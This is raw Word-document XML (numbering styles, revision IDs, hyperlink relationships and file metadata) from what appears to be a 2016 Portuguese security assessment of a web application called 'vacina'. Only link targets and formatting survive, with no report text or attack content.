    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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70B5" w:rsidRPr="00F15F82" w:rsidRDefault="00DB70B5" w:rsidP="00AC10DC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DB70B5" w:rsidRPr="00F15F82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33" w:rsidRDefault="00630433" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00630433" w:rsidRDefault="00630433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33" w:rsidRDefault="00630433" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00630433" w:rsidRDefault="00630433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3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6" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4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5">
    <w:nsid w:val="0C8D2FE2"/>
    <w:multiLevelType w:val="single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2C8934BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A4817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0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3">
    <w:nsid w:val="3B990FE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2932B0B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-268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5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3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23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0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9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952" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15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18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9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0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60252509"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27D21966"/>
    <w:lvl w:ilvl="0" w:tplc="C8F4D2F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1571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6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7D5624C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC4475C4"/>
    <w:lvl w:ilvl="0" w:tplc="0416000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3408" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4128" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4848" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5568" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6288" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="7008" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7728" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8448" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0416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28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1"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="11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0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="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062FF"/>
    <w:rsid w:val="00013EA5"/>
    <w:rsid w:val="00015DE3"/>
    <w:rsid w:val="00022ED2"/>
    <w:rsid w:val="00025045"/>
    <w:rsid w:val="00036A5D"/>
    <w:rsid w:val="00046E12"/>
    <w:rsid w:val="000536AA"/>
    <w:rsid w:val="0005686A"/>
    <w:rsid w:val="000673F6"/>
    <w:rsid w:val="00093CAB"/>
    <w:rsid w:val="000A6729"/>
    <w:rsid w:val="000C72B3"/>
    <w:rsid w:val="000D038A"/>
    <w:rsid w:val="000D3326"/>
    <w:rsid w:val="000D4E90"/>
    <w:rsid w:val="000E26E7"/>
    <w:rsid w:val="000E2EE2"/>
    <w:rsid w:val="000E35CD"/>
    <w:rsid w:val="000E6FA1"/>
    <w:rsid w:val="000F06E4"/>
    <w:rsid w:val="00101063"/>
    <w:rsid w:val="001031B5"/>
    <w:rsid w:val="001151C8"/>
    <w:rsid w:val="001247A7"/>
    <w:rsid w:val="001557DC"/>
    <w:rsid w:val="001609AB"/>
    <w:rsid w:val="001702C9"/>
    <w:rsid w:val="00174603"/>
    <w:rsid w:val="00174B27"/>
    <w:rsid w:val="00184BA7"/>
    <w:rsid w:val="00185ED4"/>
    <w:rsid w:val="00190AAD"/>
    <w:rsid w:val="00191402"/>
    <w:rsid w:val="001923D7"/>
    <w:rsid w:val="001968AD"/>
    <w:rsid w:val="00196FF2"/>
    <w:rsid w:val="00197C78"/>
    <w:rsid w:val="001A5B8E"/>
    <w:rsid w:val="001A5DFB"/>
    <w:rsid w:val="001B2F09"/>
    <w:rsid w:val="001C4F4D"/>
    <w:rsid w:val="001C7028"/>
    <w:rsid w:val="001E29F7"/>
    <w:rsid w:val="001F5050"/>
    <w:rsid w:val="00201EA5"/>
    <w:rsid w:val="0020416E"/>
    <w:rsid w:val="00204E77"/>
    <w:rsid w:val="002151B5"/>
    <w:rsid w:val="00224FD8"/>
    <w:rsid w:val="00236FDF"/>
    <w:rsid w:val="00240857"/>
    <w:rsid w:val="0024287E"/>
    <w:rsid w:val="0024453B"/>
    <w:rsid w:val="00265100"/>
    <w:rsid w:val="00265310"/>
    <w:rsid w:val="00271556"/>
    <w:rsid w:val="002719E7"/>
    <w:rsid w:val="0027244F"/>
    <w:rsid w:val="00284BB3"/>
    <w:rsid w:val="00294FE0"/>
    <w:rsid w:val="0029632F"/>
    <w:rsid w:val="00296685"/>
    <w:rsid w:val="002A0DD8"/>
    <w:rsid w:val="002A5CE5"/>
    <w:rsid w:val="002B1EF3"/>
    <w:rsid w:val="002C0836"/>
    <w:rsid w:val="002C467E"/>
    <w:rsid w:val="002C52C4"/>
    <w:rsid w:val="002D20FB"/>
    <w:rsid w:val="002D3D74"/>
    <w:rsid w:val="002D4365"/>
    <w:rsid w:val="002E34E0"/>
    <w:rsid w:val="003164B7"/>
    <w:rsid w:val="003178EE"/>
    <w:rsid w:val="00322A98"/>
    <w:rsid w:val="00323A19"/>
    <w:rsid w:val="00337476"/>
    <w:rsid w:val="003745C8"/>
    <w:rsid w:val="00384949"/>
    <w:rsid w:val="00384E80"/>
    <w:rsid w:val="003A39F6"/>
    <w:rsid w:val="003A5422"/>
    <w:rsid w:val="003B3BB8"/>
    <w:rsid w:val="003D0913"/>
    <w:rsid w:val="003D141C"/>
    <w:rsid w:val="003D23F9"/>
    <w:rsid w:val="003E1ACB"/>
    <w:rsid w:val="003E38DF"/>
    <w:rsid w:val="003E7654"/>
    <w:rsid w:val="003F3756"/>
    <w:rsid w:val="003F40A0"/>
    <w:rsid w:val="003F4807"/>
    <w:rsid w:val="003F56AB"/>
    <w:rsid w:val="003F64B7"/>
    <w:rsid w:val="00412443"/>
    <w:rsid w:val="00417333"/>
    <w:rsid w:val="00430E45"/>
    <w:rsid w:val="00455AB7"/>
    <w:rsid w:val="00456110"/>
    <w:rsid w:val="0045732E"/>
    <w:rsid w:val="004741DB"/>
    <w:rsid w:val="0048383A"/>
    <w:rsid w:val="0049317F"/>
    <w:rsid w:val="004B1DCC"/>
    <w:rsid w:val="004B4607"/>
    <w:rsid w:val="004C1B81"/>
    <w:rsid w:val="004C783E"/>
    <w:rsid w:val="004E0A86"/>
    <w:rsid w:val="004E12C9"/>
    <w:rsid w:val="004E1803"/>
    <w:rsid w:val="004E2307"/>
    <w:rsid w:val="004F3071"/>
    <w:rsid w:val="004F40AA"/>
    <w:rsid w:val="00503644"/>
    <w:rsid w:val="005135D8"/>
    <w:rsid w:val="00517685"/>
    <w:rsid w:val="00530877"/>
    <w:rsid w:val="005352FA"/>
    <w:rsid w:val="00537F7B"/>
    <w:rsid w:val="00544368"/>
    <w:rsid w:val="00546F66"/>
    <w:rsid w:val="00557D26"/>
    <w:rsid w:val="00564674"/>
    <w:rsid w:val="00564D7D"/>
    <w:rsid w:val="00567ED2"/>
    <w:rsid w:val="00572A0D"/>
    <w:rsid w:val="00594AD8"/>
    <w:rsid w:val="005967D5"/>
    <w:rsid w:val="005A089C"/>
    <w:rsid w:val="005A5292"/>
    <w:rsid w:val="005A68AB"/>
    <w:rsid w:val="005B3078"/>
    <w:rsid w:val="005B5243"/>
    <w:rsid w:val="005D3B2A"/>
    <w:rsid w:val="005D6685"/>
    <w:rsid w:val="005D6A2A"/>
    <w:rsid w:val="005E239F"/>
    <w:rsid w:val="005F4015"/>
    <w:rsid w:val="005F470B"/>
    <w:rsid w:val="005F6E06"/>
    <w:rsid w:val="005F79D1"/>
    <w:rsid w:val="006035EF"/>
    <w:rsid w:val="00603B2C"/>
    <w:rsid w:val="00605CFE"/>
    <w:rsid w:val="006071F5"/>
    <w:rsid w:val="00623C1F"/>
    <w:rsid w:val="0062442F"/>
    <w:rsid w:val="00626AC7"/>
    <w:rsid w:val="00630433"/>
    <w:rsid w:val="0063700A"/>
    <w:rsid w:val="00640C50"/>
    <w:rsid w:val="00641283"/>
    <w:rsid w:val="006473CA"/>
    <w:rsid w:val="00650630"/>
    <w:rsid w:val="006515FB"/>
    <w:rsid w:val="00654CAB"/>
    <w:rsid w:val="00654DEF"/>
    <w:rsid w:val="006612A3"/>
    <w:rsid w:val="006635A8"/>
    <w:rsid w:val="00670E3E"/>
    <w:rsid w:val="0068102E"/>
    <w:rsid w:val="006853AA"/>
    <w:rsid w:val="006876BB"/>
    <w:rsid w:val="006A38D8"/>
    <w:rsid w:val="006A578B"/>
    <w:rsid w:val="006C08DA"/>
    <w:rsid w:val="006C2DFF"/>
    <w:rsid w:val="006C31FD"/>
    <w:rsid w:val="006D580D"/>
    <w:rsid w:val="006D73FC"/>
    <w:rsid w:val="006E2559"/>
    <w:rsid w:val="006F6948"/>
    <w:rsid w:val="006F6982"/>
    <w:rsid w:val="00702C53"/>
    <w:rsid w:val="007067BC"/>
    <w:rsid w:val="0070782B"/>
    <w:rsid w:val="00707948"/>
    <w:rsid w:val="00707E1B"/>
    <w:rsid w:val="007260B8"/>
    <w:rsid w:val="00736DBC"/>
    <w:rsid w:val="0074275B"/>
    <w:rsid w:val="00751591"/>
    <w:rsid w:val="00762DFF"/>
    <w:rsid w:val="00763063"/>
    <w:rsid w:val="0076417A"/>
    <w:rsid w:val="00765ACB"/>
    <w:rsid w:val="00777DDF"/>
    <w:rsid w:val="00791E90"/>
    <w:rsid w:val="007D3513"/>
    <w:rsid w:val="007E46A7"/>
    <w:rsid w:val="007F5D29"/>
    <w:rsid w:val="00801C36"/>
    <w:rsid w:val="00807BFC"/>
    <w:rsid w:val="00817857"/>
    <w:rsid w:val="00824DA2"/>
    <w:rsid w:val="00825FE5"/>
    <w:rsid w:val="00827015"/>
    <w:rsid w:val="00830E80"/>
    <w:rsid w:val="00831A3E"/>
    <w:rsid w:val="00834FAA"/>
    <w:rsid w:val="00837F79"/>
    <w:rsid w:val="00846A20"/>
    <w:rsid w:val="0084777A"/>
    <w:rsid w:val="00857C40"/>
    <w:rsid w:val="00870818"/>
    <w:rsid w:val="008719F1"/>
    <w:rsid w:val="00881DA5"/>
    <w:rsid w:val="00885145"/>
    <w:rsid w:val="008872A1"/>
    <w:rsid w:val="00892814"/>
    <w:rsid w:val="00892BCB"/>
    <w:rsid w:val="008A7473"/>
    <w:rsid w:val="008A79EE"/>
    <w:rsid w:val="008A7BB2"/>
    <w:rsid w:val="008B447D"/>
    <w:rsid w:val="008C2F72"/>
    <w:rsid w:val="008C6DC7"/>
    <w:rsid w:val="008D02E1"/>
    <w:rsid w:val="008D0530"/>
    <w:rsid w:val="00906B58"/>
    <w:rsid w:val="00915C31"/>
    <w:rsid w:val="00930BEA"/>
    <w:rsid w:val="00934569"/>
    <w:rsid w:val="00944F31"/>
    <w:rsid w:val="00945AD3"/>
    <w:rsid w:val="00967B9F"/>
    <w:rsid w:val="00985A8F"/>
    <w:rsid w:val="009A2041"/>
    <w:rsid w:val="009A6B56"/>
    <w:rsid w:val="009A7448"/>
    <w:rsid w:val="009B63C8"/>
    <w:rsid w:val="009B7BA9"/>
    <w:rsid w:val="009C102E"/>
    <w:rsid w:val="009C3F25"/>
    <w:rsid w:val="009C4FBC"/>
    <w:rsid w:val="009C5396"/>
    <w:rsid w:val="009C7901"/>
    <w:rsid w:val="009D0F86"/>
    <w:rsid w:val="009E0E00"/>
    <w:rsid w:val="009F24CC"/>
    <w:rsid w:val="009F30B5"/>
    <w:rsid w:val="009F42DE"/>
    <w:rsid w:val="00A03082"/>
    <w:rsid w:val="00A206ED"/>
    <w:rsid w:val="00A24E0E"/>
    <w:rsid w:val="00A338A6"/>
    <w:rsid w:val="00A40129"/>
    <w:rsid w:val="00A63EAA"/>
    <w:rsid w:val="00A66072"/>
    <w:rsid w:val="00A83EB9"/>
    <w:rsid w:val="00A93306"/>
    <w:rsid w:val="00A93C57"/>
    <w:rsid w:val="00A9523B"/>
    <w:rsid w:val="00A966EC"/>
    <w:rsid w:val="00AA00BE"/>
    <w:rsid w:val="00AB1C01"/>
    <w:rsid w:val="00AB57A1"/>
    <w:rsid w:val="00AB70E4"/>
    <w:rsid w:val="00AC10DC"/>
    <w:rsid w:val="00AF248B"/>
    <w:rsid w:val="00B04AF1"/>
    <w:rsid w:val="00B135C4"/>
    <w:rsid w:val="00B25D43"/>
    <w:rsid w:val="00B3361B"/>
    <w:rsid w:val="00B42017"/>
    <w:rsid w:val="00B51059"/>
    <w:rsid w:val="00B560B0"/>
    <w:rsid w:val="00B71318"/>
    <w:rsid w:val="00B7146E"/>
    <w:rsid w:val="00B71A0F"/>
    <w:rsid w:val="00B800D4"/>
    <w:rsid w:val="00B846D4"/>
    <w:rsid w:val="00B854D0"/>
    <w:rsid w:val="00B959F5"/>
    <w:rsid w:val="00BA7CEE"/>
    <w:rsid w:val="00BB751B"/>
    <w:rsid w:val="00BC05C8"/>
    <w:rsid w:val="00BC1742"/>
    <w:rsid w:val="00BC1926"/>
    <w:rsid w:val="00BC5B4A"/>
    <w:rsid w:val="00BC5DD9"/>
    <w:rsid w:val="00BD33F6"/>
    <w:rsid w:val="00BE4C3F"/>
    <w:rsid w:val="00BE58C0"/>
    <w:rsid w:val="00BF5785"/>
    <w:rsid w:val="00BF6E55"/>
    <w:rsid w:val="00C0198A"/>
    <w:rsid w:val="00C07952"/>
    <w:rsid w:val="00C07971"/>
    <w:rsid w:val="00C12C3D"/>
    <w:rsid w:val="00C32280"/>
    <w:rsid w:val="00C343E2"/>
    <w:rsid w:val="00C366F7"/>
    <w:rsid w:val="00C36925"/>
    <w:rsid w:val="00C3730D"/>
    <w:rsid w:val="00C624EB"/>
    <w:rsid w:val="00C815A6"/>
    <w:rsid w:val="00C8356E"/>
    <w:rsid w:val="00C86D69"/>
    <w:rsid w:val="00C97F3F"/>
    <w:rsid w:val="00CA5E41"/>
    <w:rsid w:val="00CB425C"/>
    <w:rsid w:val="00CC3790"/>
    <w:rsid w:val="00CD0164"/>
    <w:rsid w:val="00CD779F"/>
    <w:rsid w:val="00CE03DD"/>
    <w:rsid w:val="00CE2FCC"/>
    <w:rsid w:val="00CE3185"/>
    <w:rsid w:val="00CE679F"/>
    <w:rsid w:val="00D04B46"/>
    <w:rsid w:val="00D24FC5"/>
    <w:rsid w:val="00D32318"/>
    <w:rsid w:val="00D4218C"/>
    <w:rsid w:val="00D43F1D"/>
    <w:rsid w:val="00D44803"/>
    <w:rsid w:val="00D46C6B"/>
    <w:rsid w:val="00D50B6F"/>
    <w:rsid w:val="00D602EF"/>
    <w:rsid w:val="00D60336"/>
    <w:rsid w:val="00D62225"/>
    <w:rsid w:val="00D65D65"/>
    <w:rsid w:val="00D76012"/>
    <w:rsid w:val="00D77DFF"/>
    <w:rsid w:val="00D967F2"/>
    <w:rsid w:val="00D975CE"/>
    <w:rsid w:val="00DB70B5"/>
    <w:rsid w:val="00DD39B4"/>
    <w:rsid w:val="00DD5893"/>
    <w:rsid w:val="00DE2F1B"/>
    <w:rsid w:val="00DF0646"/>
    <w:rsid w:val="00E01CAE"/>
    <w:rsid w:val="00E068E6"/>
    <w:rsid w:val="00E15301"/>
    <w:rsid w:val="00E158B8"/>
    <w:rsid w:val="00E16F18"/>
    <w:rsid w:val="00E27C4B"/>
    <w:rsid w:val="00E400F9"/>
    <w:rsid w:val="00E453D6"/>
    <w:rsid w:val="00E513AC"/>
    <w:rsid w:val="00E52417"/>
    <w:rsid w:val="00E52521"/>
    <w:rsid w:val="00E650F5"/>
    <w:rsid w:val="00E77F75"/>
    <w:rsid w:val="00E92559"/>
    <w:rsid w:val="00E92ED1"/>
    <w:rsid w:val="00E9423C"/>
    <w:rsid w:val="00E95ED3"/>
    <w:rsid w:val="00EB09F2"/>
    <w:rsid w:val="00EC2366"/>
    <w:rsid w:val="00EC5D2B"/>
    <w:rsid w:val="00ED180C"/>
    <w:rsid w:val="00ED7438"/>
    <w:rsid w:val="00EF59CB"/>
    <w:rsid w:val="00F018F3"/>
    <w:rsid w:val="00F04EFF"/>
    <w:rsid w:val="00F05851"/>
    <w:rsid w:val="00F149B2"/>
    <w:rsid w:val="00F15B60"/>
    <w:rsid w:val="00F15F82"/>
    <w:rsid w:val="00F248C0"/>
    <w:rsid w:val="00F24DE3"/>
    <w:rsid w:val="00F31428"/>
    <w:rsid w:val="00F3154F"/>
    <w:rsid w:val="00F52870"/>
    <w:rsid w:val="00F5692A"/>
    <w:rsid w:val="00F6048E"/>
    <w:rsid w:val="00F71E4B"/>
    <w:rsid w:val="00F8563B"/>
    <w:rsid w:val="00F935DA"/>
    <w:rsid w:val="00FA1088"/>
    <w:rsid w:val="00FB3CB1"/>
    <w:rsid w:val="00FC374A"/>
    <w:rsid w:val="00FC41D3"/>
    <w:rsid w:val="00FE6FEB"/>
    <w:rsid w:val="00FF1C9C"/>
    <w:rsid w:val="00FF400C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25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25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g"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pt.wikipedia.org/wiki/Network_Time_Protocol" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://software.dzhuvinov.com/cors-filter.html" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/cc736675(v=ws.10)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www.teamsid.com/worst-passwords-201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192.168.0.58/vacina/index.php?pg=servidores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54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.oracle.com/cd/B28359_01/appdev.111/b28370/commen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hyperlink" Target="https://hackertarget.com/sqlmap-post-request-injection/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/ms188621(v=sql.105)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pt.wikipedia.org/wiki/Simple_Network_Management_Protoco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1.jpg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.7/en/commen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192.168.0.58/vacina/login.php?logado=false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hyperlink" Target="https://pt.wikipedia.org/wiki/NetBIOS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w3.org/TR/cor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E3BE-1C0D-4AEC-8369-5839751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56</Pages>
  <Words>8832</Words>
  <Characters>47697</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>397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Pamela Beatriz</cp:lastModifiedBy>
  <cp:revision>301</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-25T02:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-16T05:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>